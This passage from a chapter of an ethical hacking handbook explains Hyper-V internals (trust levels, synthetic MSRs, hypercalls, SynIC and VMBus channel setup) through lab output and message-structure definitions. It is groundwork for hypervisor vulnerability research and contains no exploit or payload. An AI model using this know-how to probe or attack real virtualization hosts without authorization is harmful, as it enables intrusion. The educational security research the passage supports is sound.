                 The worker process has no direct hypercall access (granted only to ring-0). Instead,
              it must use the interface provided by the Virtualization Infrastructure Driver (VID):
              vid.sys. The user-mode side that talks to the VID is implemented in vid.dll, imported by
              the worker process. The kernel notifies the worker process of guest events (like accesses to
              I/O ports or MMIO) through the VID Notification Dispatcher (VND), these events are
              based on intercept notifications coming from the VMM. When handling a VM-Exit (for
              example, an I/O port access or an EPT violation), the VMM checks for registered inter-
              cepts and notifies the kernel in the root partition, which in turn notifies the worker process.

              Virtualization Server Providers
              Virtualization Service Providers (VSPs) are implemented as kernel drivers running in the
              root partition that provide synthetic device support to enlightened (virtualization-aware)
              children partitions. Synthetic devices are efficient, paravirtualized devices.

                                 TIP A complex and important VSP is vmswitch.sys. Over the years multiple
                                 vulnerabilities have been found in it.

                 Guests willing to make use of a synthetic device must implement on their side a
              Virtualization Service Consumer (VSC) to communicate with the device’s VSP.
              Communication between VSPs and VSCs happens over an inter-partition communica-
              tion channel called VMBus (we will discuss the VMBus later in this chapter).

              Integration Components
              Guest additions communicate (over the VMBus) with Integration Components (ICs)6 to
              provide convenience features and performance enhancements to the VM.
                                                                                  Chapter 25: Inside Hyper-V
            NOTE Every VMBus “device” (including ICs) has a globally unique identifier
            (GUID)7 assigned that children partitions can use to identify the device they
            want to establish a connection to.

   Integration Components usually found in a Hyper-V VM include the heartbeat
service, key-value data exchange (KVP), file copy, time synchronization, Volume Shadow
Copy, and graceful VM shutdown. They are implemented in the worker process; how-
ever, it is possible to create independent integration services that can communicate via
Hyper-V sockets.8

            TIP One of the code examples (GHHv6/ch25/labs/time_sync/py) provided
            with this chapter communicates with the time synchronization IC.

Virtual Trust Levels
Virtual Trust Levels (VTLs) provide an intra-partition isolation mechanism based on
multiple virtual processor context levels with different privileges. Currently, Hyper-V
implements two levels: VTL0 (least privileged) and VTL1 (most privileged).
   Initially, partitions run at VTL0 but can use the HvCallEnablePartitionVtl hypercall
to activate higher VTLs. After a new VTL has been enabled for the partition, it has to
be enabled for its virtual processor(s), which is accomplished by the HvCallEnableVpVtl
hypercall. A VTL can access its own configuration instance or those of lower VTLs only.
In the same way, software running in VTL1 can access resources belonging to VTL0, but
not the other way around.

                                                                                                               PART V
            NOTE Enabling a VTL requires that the partition has the AccessVsm9
            capability. The root partition has this capability.

   One of the main aspects of VTL is the ability to isolate memory regions across the
different privilege levels. This allows the implementation of security features such as
Hypervisor-protected Code Integrity (HVCI). The hypervisor keeps a different set of
SLAT tables (on Intel-based systems, EPT is used) for each VTL, and even if privileged
software in VTL0 is compromised, an access attempt to a protected region will cause an
EPT violation. The hypervisor captures it and then notifies the software in VTL1 (via an
intercept), which decides how to handle it.

            NOTE Not just memory accesses can be intercepted and handled by VTL1;
            every critical part of the CPU state must be protected, including some
            model-specific registers (MSRs).
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 This kind of access violation event causes a context switch from VTL0 to VTL1.
              Other sources of events that cause VTL0 to VTL1 transitions are interrupts (each
              VTL has its own interrupt controller) and VTL calls (issued explicitly through the
              HvCallVtlCall hypercall).
                 A context switch from VTL1 to VTL0 can only happen explicitly, when the software
              running in VTL1 calls the HvCallVtlReturn hypercall.
                 VTLs are used to implement Secure Kernel (SK). During the boot-loading process
              (after Hyper-V has loaded), both the NT kernel and SK are loaded (in VTL0). Then
              VTL1 is enabled and configured to isolate SK (now in VTL1) from the NT kernel,
              which keeps its execution at VTL0.

              Generation-1 VMs
              There are two VM “generations” in Hyper-V. The old-style VMs known as “Generation-1”
              provide full-device emulation (implemented in the worker process) to run unmodified
              guest OSs. This emulated environment is a BIOS-based architecture with legacy devices.
              Paravirtualized (“synthetic”) devices are also available to virtualization-aware guests;
              however, Generation-1 guests can only boot from the emulated devices.

              Lab 25-1: Scanning PCI Devices in a Generation-1 VM

              Our framework includes the GHHv6/ch25/labs/pci.py module, which can be used to
              inject and execute code that scans the PCI bus of the guest. Let’s use this module to see
              what hardware is present in a Generation-1 VM. To do so, we will open a Python shell on
              our “client” box (we will run all the labs of this chapter from our “client” box):
              ┌──(root ghh6)-[/labs]
              └─# python3
              Python 3.9.7 (default, Sep 3 2021, 06:18:44)
              [GCC 10.3.0] on linux
              Type "help", "copyright", "credits" or "license" for more information.
              >>> import pci
              >>> import hyperv_guest
              >>> pci.Session(hyperv_guest.GuestGen1).run()
              ...omitted for brevity...
              PRINT: kmain at 0x000000000040135d
              00:00:00: Host bridge
              ...omitted for brevity...
              00:07:00: ISA bridge
              ...omitted for brevity...
              00:07:01: IDE controller
                    BAR MEM-space                 : 0x0                size: 0x0
                    BAR MEM-space                 : 0x0                size: 0x0
                    BAR IO-space                  : 0xffa0             size: 0x10
              ...omitted for brevity...
              00:07:03: Other bridge device
              ...omitted for brevity...
                                                                               Chapter 25: Inside Hyper-V
00:08:00: VGA-compatible controller
      BAR MEM-space                 : 0xf8000000                size: 0x4000000
      BAR MEM-space                 : 0x0                       size: 0x0
      BAR MEM-space                 : 0x0                       size: 0x0
...omitted for brevity...
Stopping VM...

  In the output, we can see information about the emulated devices present in a
Generation-1 VM created with a default configuration.

            NOTE Our new base class is now called Session, and it generalizes on the
            Fuzzer class we implemented in Chapter 24.

Generation 2 VMs
The newer, “Generation-2” VMs can only run virtualization-aware (“enlightened”)
guests. Except for a couple of emulated devices, most have been replaced by synthetic
ones. These provide “enlightened I/O” over an efficient inter-partition communication
mechanism known as VMBus. Synthetic devices are usually based on existing protocols
(like SCSI, RNDIS, or HID) but use VMBus as the basic transport layer. Later in this
chapter, we will discuss VMBus in more detail.
    Generation-2 VMs are based on the Unified Extensible Firmware Interface (UEFI)
architecture, which enables features like Secure Boot as well as allows VMs to boot from
paravirtualized devices.

                                                                                                            PART V
Lab 25-2: Scanning PCI Devices in a Generation-2 VM

Let’s see what happens if we attempt to scan the PCI bus in a Generation-2 VM:
┌──(root ghh6)-[/labs]
└─# python3
Python 3.9.7 (default, Sep 3 2021, 06:18:44)
[GCC 10.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pci
>>> import hyperv_guest
>>> pci.Session(hyperv_guest.GuestGen2).run()
Copying namedpipe_proxy.exe to remote host...
Copying kernel_bios.iso to remote host...
Copying kernel_efi.iso to remote host...
Creating VM...
Starting VM...
Connecting...
PRINT: kmain at 0x000000000040135d
Stopping VM...
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 In this case, there is no output at all—not only are emulated devices gone but the
              whole PCI bus as well! In reality, a few emulated devices (for example, video) still remain;
              we just can’t find them through the PCI bus. These can still be found through ACPI
              tables exposed to the guest.

              Hyper-V Synthetic Interface
              Hyper-V exposes an interface to paravirtualization features that improves VM efficiency
              and provides inter-partition communication support. The VMM exposes this synthetic
              interface through extensions to model-specific registers (MSRs), the Synthetic Interrupt
              Controller (SynIC), and hypercalls. On top of the inter-partition communication interface
              provided by the VMM, the root partition implements the VMBus, which is used by VSPs
              and ICs.

              Synthetic MSRs
              Hyper-V exposes a set of synthetic MSRs that can be accessed through the RDMSR/
              WRMSR instructions. A list of these MSRs can be found in the Hypervisor Top-Level
              Functional Specification (TLFS).10 In this chapter, we will focus on the MSRs used to
              map the “hypercall page” and the ones used to manage the SynIC.

              Guest OS Identity MSR
              Before we can use features like hypercalls, we need to register our guest OS identity
              to Hyper-V. This is achieved by writing vendor and OS version information to the
              HV_X64_MSR_GUEST_OS_ID (0x40000000) register. In the GHHv6/ch25/labs/
              hypercall.py module provided with the code of this chapter, we set this MSR to an ID
              that fakes a Windows 10 guest.

                                 TIP     A description of the layout for this register can be found in the TLFS.

              The Hypercall Page MSR
              CPU vendors use different hypercall instructions; Hyper-V provides a generic interface
              by mapping a “hypercall page” containing the right instruction for the current CPU.
              A guest doesn’t need to know which hypercall instruction to use, and it shouldn’t attempt
              to use instructions like VMCALL directly. Instead, hypercalls should be used through
              the hypercall page.

                                 TIP If you are familiar with Linux’s VSYSCALL/VDSO pages, the same concept
                                 is applied in the hypercall page.
                                                                                 Chapter 25: Inside Hyper-V
  We will write a GPA to HV_X64_MSR_HYPERCALL (0x40000001), where we
want the hypercall page to be mapped. The layout of this MSR is as follows:

   • Bits 63–12 Contain the Guest Physical Page Number (GPFN) where the
     hypercall page is mapped.
   • Bits 11–2 Reserved bits (ignored).
   • Bit 1 If this bit is set, the MSR is made immutable. After that, the GPFN can’t
     be modified until the guest is rebooted.
   • Bit 0 Enable/disable the hypercall page.

Lab 25-3: Setting Up the Hypercall Page and Dumping Its Contents

If we invoke the GHHv6/ch25/labs/hypercall.py module directly, it dumps the hypercall
page contents after mapping it. We can use it to observe what instruction implements the
hypercall mechanism for our current CPU:
┌──(root ghh6)-[/labs]
└─# python3 hypercall.py
...omitted for brevity...
Hypercall page contents:
0x1011000: vmcall❶
0x1011003: ret❷
0x1011004: mov     ecx, eax
0x1011006: mov     eax, 0x11❸
0x101100b: vmcall
0x101100e: ret
0x101100f: mov     rax, rcx

                                                                                                              PART V
0x1011012: mov     rcx, 0x11❹
0x1011019: vmcall
0x101101c: ret
0x101101d: mov     ecx, eax
0x101101f: mov     eax, 0x12❺
0x1011024: vmcall
0x1011027: ret
0x1011028: mov     rax, rcx
0x101102b: mov     rcx, 0x12❻
0x1011032: vmcall
0x1011035: ret
0x1011036: nop
0x1011037: nop
...

    In this case, the instruction is VMCALL ❶, followed by a RET ❷ instruction. A guest
can issue a hypercall by executing a CALL instruction to the address of the hypercall page
(in this case, 0x1011000).
    We can also see some code used to perform VTL calls. At ❸, the EAX register is
set to 0x11, corresponding to the call-code of HvCallVtlCall (this is the 32-bit ABI).
At ❹, we have the 64-bit version of the same call. The call at ❺ corresponds to a 32-bit
HvCallVtlReturn, and at ❻ we have the 64-bit version. The rest of the hypercall page
is filled with a NOP pattern.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              SynIC MSRs
              The Synthetic Interrupt Controller (SynIC) is an extension to the virtualized interrupt
              controller (virtual LAPIC). The SynIC not only provides efficient interrupt delivery but is
              also used for inter-partition communication. Partitions can communicate with each other
              via two mechanisms: messages and events. When a target partition receives a message or
              an event, it is through the SynIC.
              SynIC CONTROL MSR Each virtual processor has a SynIC, which is disabled by
              default. To enable the SynIC for the current virtual processor, we must write to the
              HV_X64_MSR_SCONTROL (0x40000080) register, setting its “enable” field. The
              layout for the HV_X64_MSR_SCONTROL register is as follows:

                    • Bits 63–1 Reserved bits.
                    • Bit 0 Enable/disable SynIC for the current virtual processor.

              SINT MSRs The SynIC provides 16 consecutive “synthetic interrupt source” (SINTx) regis-
              ters: HV_X64_MSR_SINT0 (0x40000090) to HV_X64_MSR_SINT15 (0x4000009F).
              Interrupt sources can be selectively unmasked and then assigned to a particular interrupt
              vector. This way, the guest can be notified of events via interrupts (if interrupts are enabled),
              which get handled by the corresponding service routine from the guest’s IDT (Interrupt
              Descriptor Table). The layout of a SINT register is the following:

                    • Bits 63–19 Reserved bits.
                    • Bit 18 “Polling” field. If this bit is enabled, the interrupt source is unmasked
                      without generating interrupts.
                    • Bit 17 “AutoEOI” field. If this bit is enabled, an implicit End Of Interrupt
                      (EOI) is performed upon interrupt delivery.
                    • Bit 16 “Masked” field. All SINT registers start with this bit set by default.
                      A guest can unmask an interrupt source by clearing this bit.
                    • Bits 15–8 Reserved bits.
                    • Bits 7–0 Interrupt vector. A guest can set this value to any vector in the
                      16–255 range.
                  The destination SINTx of a message or event can be the following

                    • Implicit (for example, SINT0 is reserved for messages originating from the
                      hypervisor).
                    • Explicit (for example, the SINTx field of the Synthetic Timer Configuration
                      registers).
                    • Assigned to a port allocated through the HvCallCreatePort hypercall. The
                      caller must specify the port type: HvPortTypeMessage, HvPortTypeEvent,
                      or HvPortTypeMonitor. For the first two types, a target SINTx must be specified.
                      This hypercall is used by the root partition to create ports used by VMBus.
                                                                               Chapter 25: Inside Hyper-V
SIMP MSR The HV_X64_MSR_SIMP (0x40000083) register is used to enable and
assign the base address of the Synthetic Interrupt Message Page (SIMP). This page
contains a set of message slots to receive messages from either the hypervisor or other
partitions (senders use the HvCallPostMessage hypercall).
   Slots are arranged as an array of HV_MESSAGE data structures, with one slot per
SINTx (16). After copying a new message to a slot, the hypervisor will try to deliver an
edge-triggered interrupt to the corresponding SINTx (if not in polling mode).
   The HV_MESSAGE structure is defined as follows:
#define HV_MESSAGE_MAX_PAYLOAD_QWORD_COUNT 30
typedef struct
{
   UINT8 MessagePending:1;
   UINT8 Reserved:7;
} HV_MESSAGE_FLAGS;

typedef struct
{
   HV_MESSAGE_TYPE MessageType;❶
   UINT8 PayloadSize;
   HV_MESSAGE_FLAGS MessageFlags;
   UINT16 Reserved;
   union
   {
       UINT64 OriginationId;
       HV_PARTITION_ID Sender;❷
       HV_PORT_ID Port; ❸
   };
} HV_MESSAGE_HEADER;

typedef struct
{

                                                                                                            PART V
   HV_MESSAGE_HEADER Header;
   UINT64 Payload[HV_MESSAGE_MAX_PAYLOAD_QWORD_COUNT];
} HV_MESSAGE;

   HV_MESSAGE is composed of a header and a payload that contains the actual
message. The message header starts with a 32-bit identifier ❶. Messages originating from
the hypervisor have the HV_MESSAGE_TYPE_HYPERVISOR_MASK (0x80000000)
bit set, whereas messages originating from partitions can use any other value as long as
they don’t set that bit.
   The value HvMessageTypeNone (0x00000000) indicates a slot is empty. After receiv-
ing a message, a guest should set MessageType to HvMessageTypeNone and then assert
an end of message (EOM).
   Finally, the header contains either a partition ID ❷ (for example, intercept messages
contain the ID of the child) or a port ID ❸ (associated to a connection ID) when the
message was sent via HvCallPostMessage.
   The layout of HV_X64_MSR_SIMP is as follows:

   • Bits 63–12 GPFN where the SIMP is mapped.
   • Bits 11–1 Reserved.
   • Bit 0 Enable/disable the SIMP.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              EOM MSR After we process a message delivered to a SIMP slot and set it to
              HvMessageTypeNone, we can write a zero to HV_X64_MSR_EOM (0x40000084) to
              let the hypervisor know that it can de-queue and deliver the next message.
              SIEFP MSR HV_X64_MSR_SIEFP (0x40000082) is used to enable and assign the
              base address of the Synthetic Interrupt Event Flags Page (SIEFP). This page contains a
              16-element array of HV_SYNIC_EVENT_FLAGS; each element is a fixed-size bitmap
              with a capacity for 2,048 flags:
              #define HV_EVENT_FLAGS_BYTE_COUNT 256
              typedef struct
              {
                  UINT8 Flags[HV_EVENT_FLAGS_BYTE_COUNT];
              } HV_SYNIC_EVENT_FLAGS;

                 When a port of HvPortTypeEvent is allocated through HvCallCreatePort, the follow-
              ing information must be supplied:
              struct
              {
                  HV_SYNIC_SINT_INDEX TargetSint;❶
                  HV_VP_INDEX TargetVp;❷
                  UINT16 BaseFlagNumber;❸
                  UINT16 FlagCount;❹
                  UINT32 ReservedZ;
              } EventPortInfo;

                 In addition to a target SINTx ❶ and target virtual processor ❷, an event port has a
              base flag number ❸ and a flag count ❹. A partition can use HvCallSignalEvent to set a
              specific flag in the target partition by passing two parameters: a connection ID parameter
              (associated to an event port) and the flag number (this number must be below the event
              port’s FlagCount).
                 The value of BaseFlagNumber is added to the flag number, and the result is the abso-
              lute bit position that will be set in the HV_SYNIC_EVENT_FLAGS bitmap of the slot
              corresponding to the target SINTx.
                 After setting the flag, the hypervisor will try to deliver an edge-triggered interrupt to
              the corresponding SINTx (if not in polling mode). A guest receiving events should make
              use of an atomic Compare and Swap (CAS) instruction to clear the flags and then assert
              an EOI (via the APIC).
                 The layout of HV_X64_MSR_SIEFP is as follows:

                    • Bits 63–12 GPFN, where the SIEFP is mapped.
                    • Bits 11–1 Reserved.
                    • Bit 0 Enable/disable the SIEFP.

              Hypercalls
              Hypercalls can be called from guest code running at ring-0 (in 32-bit protected mode or
              in long-mode) through the hypercall page mechanism described earlier.
                                                                                   Chapter 25: Inside Hyper-V
             NOTE To conserve space, we will cover 64-bit calling conventions only.

   When we make a call through the hypercall page, the instruction at this page
(VMCALL in this case) traps into the VMM. The VMM’s dispatch loop checks if the
VM-Exit reason code corresponds to a VMCALL (18) and then calls a routine that is
a common entry point for all hypercalls. This routine performs further validations (for
example, it checks that RIP is within the hypercall page) and then proceeds to read the
contents of the guest’s RCX register where the following information is encoded:

   • Bits 63–60 Reserved (zero).
   • Bits 59–48 Start repetition for “rep” hypercalls.
   • Bits 47–44 Reserved (zero).
   • Bits 43–32 Total repetition count field for “rep” hypercalls.
   • Bits 31–27 Reserved (zero).
   • Bit 26 Indicates if the hypercall should be handled by the L0 or L1 hypervisor
     under nested virtualization (for space reasons, we won’t cover nested virtualization).
   • Bits 25–17 Variable header size in 8-byte blocks.
   • Bit 16 Indicates if the “fast” calling convention is used for input.
   • Bits 15–0 The “call code” that identifies a particular hypercall. The VMM
     contains a hypercall table where each entry contains the following information:
     the call code, a pointer to the handler (function) for that specific hypercall, and

                                                                                                                PART V
     information needed for processing input and output arguments (implicit header
     sizes, “rep” hypercalls, and so on).
  The way in which the input and output parameters of a hypercall are processed
depends on the value of these RCX fields and is constrained by the information in the
hypercall table entry for that particular hypercall.

Hypercalls: Slow and Fast
Input and output arguments to a hypercall can be passed in three ways: in memory, in
general-purpose registers, and in XMM registers. Hypercalls using the memory-based
approach are known as “slow,” whereas those using a register-based approach are known
as “fast.”
   When we want to use a fast hypercall, we must indicate it by setting the bit at position
16 of the RCX register; otherwise, the bit must be clear.
   When we’re passing memory-based arguments, RDX contains the GPA of the input,
whereas R8 contains the GPA of the output. Both addresses should point to valid guest
memory and should not overlap. They should be 8-byte aligned and can’t cross page
boundaries. They can’t belong to an overlay area (examples of overlays are the hypercall
Gray Hat Hacking: The Ethical Hacker’s Handbook
              page, the SIMP, and SIEFP). Read access is required for the GPA pointed to by RDX,
              whereas write access is required for the address in R8.
                 Only a subset of the available hypercalls can use register arguments; this is due to size
              constraints. For fast hypercalls using general-purpose registers, the argument size must fit
              in a 64-bit register: RDX is used for input, and R8 for output.
                 When available, XMM fast hypercalls can be used for sizes up to 112 bytes. In this
              case, data is stored in the set of registers composed of RDX, R8, plus XMM registers
              in the range of XMM0 to XMM5. The same register set can be shared for input and
              output; in the latter case, only registers that haven’t been used for input will be used to
              store the output.
                 Finally, in both slow and fast hypercalls, the RAX register is used to store the hypercall
              return value.

              Hypercalls: Simple and Rep
              Hypercalls can be classified as one of two types: simple or “rep” (repeat). Simple
              hypercalls perform an operation on a single argument, whereas “rep” hypercalls oper-
              ate on a variable-size list of fixed-size elements. An example of a simple hypercall is
              HvCallFlushVirtualAddressSpace, which is used to perform a full invalidation of the
              guest’s translation lookaside buffer (TLB):
              HV_STATUS HvCallFlushVirtualAddressSpace(
                 _In_ HV_ADDRESS_SPACE_ID AddressSpace,
                 _In_ HV_FLUSH_FLAGS Flags,
                 _In_ UINT64 ProcessorMask
                 );

              The input of this hypercall forms a fixed-size block of 24 bytes (each argument is 8 bytes).
              This is the hypercall’s “implicit header size.”
                 On the other hand, HvCallFlushVirtualAddressList is a “rep” hypercall, taking a list
              of GVA ranges to invalidate:
              HV_STATUS HvCallFlushVirtualAddressList(
                 _In_ HV_ADDRESS_SPACE_ID AddressSpace,
                 _In_ HV_FLUSH_FLAGS Flags,
                 _In_ UINT64 ProcessorMask,
                 _Inout_ PUINT32 GvaCount,❶
                 _In_reads_(GvaCount) PCHV_GVA GvaRangeList❷
                 );

              Here, the first three arguments are the same as in HvCallFlushVirtualAddressSpace,
              and they also form a 24-byte fixed-size header. We can see the GvaCount ❶ argument
              defined as both input and output; internally, this argument is encoded in the “total rep
              count” field of the RCX register. The “start rep index” field of the same register will be
              initially zero, and then the hypercall will increment it as it processes the list elements, so
              finally GvaCount can be set to its value. GvaRangeList ❷ is where the variable-size list
              starts. In memory, this is right after the 24-byte block. Each element must be of fixed
              size (in this case, 8 bytes) and the list should contain a GvaCount number of elements.
                                                                                     Chapter 25: Inside Hyper-V
             TIP The GHHv6/ch25/labs/hypercall.py module included with the
             sources of this chapter contains the implementation to make use of a “slow”
             hypercall (HvCallPostMessage) and a “fast” hypercall (HvCallSignalEvent).

   The interesting thing about “rep” hypercalls is that they can return before complet-
ing the “total rep count” and can be re-invocated (RIP is not increased and VMCALL is
re-executed), in which case they will keep processing the list elements from the last “start
rep index” value. This mechanism is known as hypercall continuation.

             NOTE The time spent inside a hypercall must be bounded so that a virtual
             processor is not stuck for long periods of time. For this reason, some simple
             hypercalls also use hypercall continuations.

Hypercalls: Variable-Size Headers
We have seen that hypercalls have an implicit fixed-size header and that “rep” hypercalls
have a variable-size list of elements. Hypercalls can also have variable-size data. Let’s take
a look at one of them:
HV_STATUS HvCallFlushVirtualAddressSpaceEx(
   _In_ HV_ADDRESS_SPACE_ID AddressSpace,
   _In_ HV_FLUSH_FLAGS Flags,
   _In_ HV_VP_SET ProcessorSet❶
   );

   This looks similar to HvCallFlushVirtualAddressSpace, but ProcessorMask has been
replaced by ProcessorSet ❶, which is a variable-size collection. In this case, the implicit

                                                                                                                  PART V
fixed-size header corresponds to the first two arguments (16-bytes), and ProcessorSet is
a variable-size header.
   In memory, a variable-size header must be placed after the fixed-size header, and its
size must be rounded to 8-byte granularity. The size of the variable header (in 8-byte
blocks) must be encoded in bits 25–17 of the RCX register.
   Our last example is a “rep” hypercall with variable-size headers:
HV_STATUS HvCallFlushVirtualAddressListEx(
   _In_ HV_ADDRESS_SPACE_ID AddressSpace,
   _In_ HV_FLUSH_FLAGS Flags,
   _In_ HV_VP_SET ProcessorSet,
   _Inout_ PUINT32 GvaCount,
   _In_reads_(GvaCount) PCHV_GVA GvaRangeList
   );

  The arguments are in the same order we should place them in memory: fixed-size
header, followed by variable-size header, and finally the “rep” list.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              VMBus
              VMBus is a channel-based communication mechanism used by VSPs and ICs. Our
              guest’s minimal prerequisites to use the VMBus are as follows:

                    • Support for calling HvCallPostMessage and HvCallSignalEvent. We need to
                      register the HV_X64_MSR_GUEST_OS_ID and map a hypercall page in
                      HV_X64_MSR_HYPERCALL.
                    • Enable the SynIC.
                    • Unmask at least one SINTx (we will use HV_X64_MSR_SINT2).
                    • Map a message page (HV_X64_MSR_SIMP).

              Initiation
              To initiate communication with the VMBus, we send (via HvCallPostMessage) an
              “initiate contact” request. This message is sent to the connection ID 4 (older versions
              use 1, but we will use 4). The layout of this message (as ported to our framework from
              the definitions found in the Linux Kernel) is as follows:
              VmbusChannelMessageHeader = c.Struct(
                  'msgtype' / c.Int32ul,❶
                  'padding' / c.Const(0, c.Int32ul)
              )
              VmbusChannelInitiateContact = c.Struct(
                  'hdr' / VmbusChannelMessageHeader,
                  'vmbus_version_requested' / c.Int32ul,❷
                  'target_vcpu'   / c.Int32ul,❸
                  'msg_sint'      / c.Int8ul,❹
                  'padding'       / c.Bytes(7),
                  'monitor_page1' / c.Int64ul,❺
                  'monitor_page2' / c.Int64ul❻
              )

                 All VMBus messages start with the same message header containing the message
              type ❶. In this case, msgtype will be 14. The next field contains a VMBus version ❷. In
              general, we should start with the highest version possible and iterate by lowering versions
              (sending multiple initiate messages) until we succeed. In our case, we will send a single
              message requesting a version that should work in our setup. Next, we have the target
              virtual processor ❸ (messages are sent to the SynIC of that processor) and the SINTx ❹
              (we will use SINT2).
                 Finally, we can supply the GPAs of two “monitor” pages. These can be used by some
              devices for fast notifications; we will set them but won’t use them. The first page ❺ is used
              for child-to-parent (root partition) notifications, and the second ❻ for parent-to-child
              notifications.
                 If negotiation succeeds, we receive a “version response” message in the SIMP slot of
              the SINTx we supplied. Keep in mind that if we don’t set the SINTx polling mode, we
              might get an interrupt to the vector we assigned to it when unmasking SINTx (so we
              would need an appropriate IDT handler for it). All messages sent by the parent are going
                                                                                Chapter 25: Inside Hyper-V
to the SINTx supplied in the “initiate contact” request. The “version response” layout is
as follows:
VmbusChannelVersionResponse = c.Struct(
    'hdr' / VmbusChannelMessageHeader,
    'version_supported' / c.Int8ul,
    'connection_state' / c.Int8ul,
    'padding'           / c.Int16ul,
    'msg_conn_id'       / c.Int32ul❶
)

   We are interested in the connection ID field ❶. We will replace our previous connec-
tion ID (4) with the one we receive here.

Requesting Offers
To discover which devices are present on the VMBus, we send a “request offers”
(msgtype 3) message, which is just a VmbusChannelMessageHeader.
   After sending the message, we will receive multiple “offer channel” (msgtype 1)
messages, finalizing with an “all offers delivered” (msgtype 4) message. The layout of an
“offer channel” is as follows:
VmbusChannelOffer = c.Struct(
    'if_type'           / UUID,❺
    'if_instance'       / UUID,❻
    'reserved1'         / c.Int64ul,
    'reserved2'         / c.Int64ul,
    'chn_flags'         / c.Int16ul,
    'mmio_megabytes'    / c.Int16ul,
    'user_def'          / c.Bytes(120),
    'sub_channel_index' / c.Int16ul,
    'reserved3'         / c.Int16ul

                                                                                                             PART V
)
VmbusChannelOfferChannel = c.Struct(
    'hdr'                    / VmbusChannelMessageHeader,
    'offer'                  / VmbusChannelOffer,
    'child_relid'            / c.Int32ul,❶
    'monitorid'              / c.Int8ul,❸
    'monitor_allocated'      / c.Int8ul,❷
    'is_dedicated_interrupt' / c.Int16ul,
    'connection_id'          / c.Int32ul❹
)

The information in this message is device specific and channel specific.
   The child_relid ❶ field contains a channel ID that will be used later for set-
ting up a shared memory region and establishing communication to the device. If
monitor_allocated ❷ is nonzero, the device makes use of monitored notifications, in
which case monitorid ❸ will be used as an index into the monitor pages (for space
reasons, we won’t discuss or use monitor pages). The event port associated to connec-
tion_id ❹ will be used to signal events to the device (via HvCallSignalEvent).
   In the device-specific information, we have if_type ❺ containing the UUID of the
device class, whereas if_instance ❻ is the UUID of a particular device (if our VM had
two devices of the same type, we would see two offers with the same if_type but different
if_instance).
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                 NOTE A universally unique identifier (UUID) is standardized 128-bit
                                 encoding for identifier labels. In this chapter, we will refer to UUID as the
                                 little-endian variant exclusively.

                The layout of the “all offers delivered” message is a VmbusChannelMessageHeader
              (msgtype 4).

              Lab 25-4: Listing VMBus Devices

              The GHHv6/ch25/labs/vmbus.py module included with this chapter implements
              everything that has been described so far. It is recommended that you read its code care-
              fully, paying special attention to every step involved.
                 If we invoke it directly, it will print the device information obtained from offer
              messages. This information includes the child_relid value, the if_instance UUID, and
              the if_type (converted to a device description from the UUID):
              ┌──(root ghh6)-[/labs]
              └─# python3 vmbus.py
              ...omitted for brevity...
              [OFFER ID: 1] 1eccfd72-4b41-45ef-b73a-4a6e44c12924 Dynamic memory
              [OFFER ID: 2] 99221fa0-24ad-11e2-be98-001aa01bbf6e Automatic Virtual Machine Activation
              [OFFER ID: 3] 58f75a6d-d949-4320-99e1-a2a2576d581c Mouse
              [OFFER ID: 4] d34b2567-b9b6-42b9-8778-0a4ec0b955bf Keyboard
              [OFFER ID: 5] 5620e0c7-8062-4dce-aeb7-520c7ef76171 Synthetic Video
              [OFFER ID: 6] 4487b255-b88c-403f-bb51-d1f69cf17f87 Automatic Virtual Machine Activation (2)
              [OFFER ID: 7] fd149e91-82e0-4a7d-afa6-2a4166cbd7c0 Heartbeat
              [OFFER ID: 8] 242ff919-07db-4180-9c2e-b86cb68c8c55 KVP
              [OFFER ID: 9] b6650ff7-33bc-4840-8048-e0676786f393 Shutdown
              [OFFER ID: 10] 2dd1ce17-079e-403c-b352-a1921ee207ee Time Synch
              [OFFER ID: 11] 2450ee40-33bf-4fbd-892e-9fb06e9214cf VSS (Backup/Restore)
              [OFFER ID: 12] f5bee29c-1741-4aad-a4c2-8fdedb46dcc2 Remote Desktop Virtualization
              [OFFER ID: 13] 6f2f86d6-114a-42b8-90ca-f5ff19bd23eb SCSI
              [OFFER ID: 14] 89b44895-a96d-4625-85b0-efc1aaa9f2a2 Network

              Opening a Channel
              Establishing communication with one of the offered devices involves two steps. First, we
              send a list of guest page frame numbers (GPFNs) describing the memory range(s) that
              we will share with the host. Second, we split this region into two ring-buffers: one for
              receiving and the other for transmitting.
                  Memory sharing between the guest and host (or more precisely, between the child
              partition and the parent partition) is achieved by creating a Guest Physical Address
              Descriptor List (GPADL). If you have ever worked with Windows memory descriptor
              lists (MDLs),11 the principle is the same: create a contiguous buffer from noncontiguous
              physical memory. In the case of GPADLs, we send GPFNs (the host will translate them
              to their respective SPFNs).
                                                                                    Chapter 25: Inside Hyper-V
   We create a GPADL from a sequence of “GPA ranges,” and each range is encoded in
the following way:
GPARange = c.Struct(
    'byte_count' / c.Int32ul,❶
    'byte_offset' / c.Int32ul,❷
    'pfn_array'   / c.Array(
        lambda t: ceil((t.byte_count + t.byte_offset) / 4096), c.Int64ul)❸
)
def gpa_range(address, size):❹
    start_pfn = address >> 12
    end_pfn = (address + size) >> 12
    return {
        'byte_count': size,
        'byte_offset': address & 0xfff,
        'pfn_array': range(start_pfn, end_pfn)
    }

   A GPA range is a variable-size structure, starting with the range size in bytes ❶ and
followed by an offset ❷ (in bytes, relative to the first memory page). The rest of the struc-
ture is a list of GPFNs ❸ representing the memory range. The number of list elements
should match with the number of pages required given the range size and start offset.
   Since our framework uses a 1:1 memory mapping model, we will just use physically
contiguous pages. Given a base address and size arguments, the gpa_range ❹ function
returns a GPA range.
   To create a GPADL, we send a “GPADL header” request (msgtype 8) with a list of
GPA ranges. We encode this message in the following way:
def gpa_range_size(range_list):❻
    return len(b''.join(map(GPARange.build, range_list)))

                                                                                                                 PART V
VmbusChannelGPADLHeader = c.Struct(
    'hdr'          / VmbusChannelMessageHeader,
    'child_relid' / c.Int32ul,❶
    'gpadl'        / c.Int32ul,❷
    'range_buflen' / c.Rebuild(
        c.Int16ul, lambda t: gpa_range_size(t.range)),❺
    'rangecount'   / c.Rebuild(c.Int16ul, c.len_(c.this.range)),❹
    'range'        / c.Array(c.this.rangecount, GPARange),❸
)

   After the message header, we have the child_relid ❶ field. We supply the value
obtained from the same field of the offer message of the device we want to communicate
with. The gpadl ❷ field is set to a value of our choice; it will be used to identify the
GPADL. At the end of the message we have the sequence of GPA ranges ❸. The number
